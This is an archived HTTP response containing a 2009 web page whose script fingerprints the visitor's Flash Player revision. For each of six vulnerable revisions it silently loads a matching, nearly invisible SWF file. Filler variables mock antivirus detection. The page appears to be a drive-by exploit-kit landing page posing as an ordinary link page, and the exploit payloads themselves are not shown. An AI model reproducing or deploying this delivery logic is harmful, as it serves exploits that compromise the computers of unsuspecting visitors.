HTTP/1.1 200 OK
Content-Length: 1516
ETag: "07a482ee793c91:5e9"
Date: Wed, 25 Feb 2009 02:53:14 GMT
Last-Modified: Sat, 21 Feb 2009 05:42:28 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://www.sll6890.cn/a8/flink.html
X-Polipo-Date: Wed, 25 Feb 2009 03:03:57 GMT
X-Polipo-Access: Wed, 25 Feb 2009 03:32:00 GMT

<Script src="swfobject.js" type="text/javascript"></Script>  
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script src="flash.js"></script>
<script type="text/javascript">

var fded="cqc";
if(version['major']==9){
	document.getElementById('flashversion').innerHTML="";
	if(version['rev']==115){
		var fuckavv = "SB";
		var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
		so.write("flashcontent");
		var fgfdbdf = "wef";
	}else if(version['rev']==64){
		var fuckavp = "SB";
		var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");var fccaaqqff="d";
		so.write("flashcontent");
		var djcshk="dscc";
	}else if(version['rev']==47){
		var snjd="dsa";
		var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
		so.write("flashcontent")}else if(version['rev']==45){var pdxqls="f";
		var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
		so.write("flashcontent")}else if(version['rev']==28){
		var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
		so.write("flashcontent");var kkkkkk="x";
	}else if(version['rev']==16){
		var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
		var kvvvvqqgg="vcx";
		so.write("flashcontent")
	}else if(version['rev']>=124){
		if(document.getElementById){
			document.getElementById('flashversion').innerHTML=""
		}
	}
}var fkav="BS";var fkasacv="BS";var fkahsacv="BS";var ohsacv="BS";var ouacv="BS";var juaqcv="BS";
</script>